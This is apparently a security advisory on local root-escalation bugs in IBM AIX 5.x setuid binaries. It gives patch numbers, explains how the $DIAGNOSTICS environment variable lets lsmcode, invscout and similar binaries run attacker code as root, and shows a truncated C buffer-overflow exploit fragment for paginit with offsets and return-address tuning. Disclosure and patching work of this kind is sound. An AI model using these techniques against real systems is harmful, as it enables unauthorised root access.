The following exploit codes can be used to test your system for the vulnerabilities in paginit, lsmcode and invscout that we partly reported about in our previous advisory: IBM AIX invscout Local Command Execution Vulnerability.
Credit:
The information has been provided by cees-bart.
Vulnerable Systems:
* IBM's AIX versions 5.1, 5.2 and 5.3
Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and IY64312(5.3).
Diag vulnerability:
There are (at least) 4 broken suid binaries. -r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x--- 1 root system 2796 Jan 26 2003 /usr/sbin/diag_exec
-r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x 1 root system 511362 Apr 08 2004 /usr/sbin/invscoutd
All these binaries are exploited the same way: the path set in the $DIAGNOSTICS environment is used by these binaries to execute $DIAGNOSTICS/bin/Dctrl as root.
Example:
Executing the following gives a root shell:
Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit
Does not do a bounds check on the first commandline argument, which is supposed to be a username. If you feed paginit the proper data and hit enter, root priviledges are gained.
Exploit:
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not overwritten)
